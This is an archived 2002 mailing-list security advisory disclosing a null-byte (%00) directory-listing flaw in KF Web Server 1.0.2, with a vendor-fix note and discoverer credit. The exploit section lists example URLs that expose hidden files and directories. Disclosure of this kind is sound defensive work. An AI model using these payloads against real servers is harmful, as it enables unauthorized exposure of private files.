Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
From: Securiteinfo.com (webmastersecuriteinfo.com)
Date: Sun Jul 07 2002 - 14:42:47 CDT

  • Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

    KF Web Server version 1.0.2 shows file and directory content

    .oO Overview Oo.
    KF Web Server version 1.0.2 shows file and directory content
    Discovered on 2002, July, 2nd
    Vendor: KeyFocus (http://www.keyfocus.net/kfws/)

    KF Web Server 1.0.2 is a free personal web server available for Windows
    98,ME,2000,XP. This web server can shows file and directory content.

    .oO Details Oo.
    If the requested URL contains a %00 after a directory name, then the server
    shows all files in the directory content.
    A hacker can see all hidden (non-HTML linked) files and directories on the

    .oO Exploit Oo.
    The exploit is really easy. You can do it with any browser
    Examples :
    http://server_name/index.html : Normal use.
    http://server_name/%00 : You get the vulnerability.
    http://server_name/index.html%00 : Is *not* vulnerable.
    http://server_name/%00index.html : You get the vulnerability. In fact
    everything after %00 is ignored.
    http://server_name/subdir/%00 : You get the vulnerability.

    .oO Solution Oo.
    The vendor has been informed and has solved the problem.
    Upgrade to KF Web Server version 1.0.3

    .oO Discovered by Oo.
    Arnaud Jacques aka scrap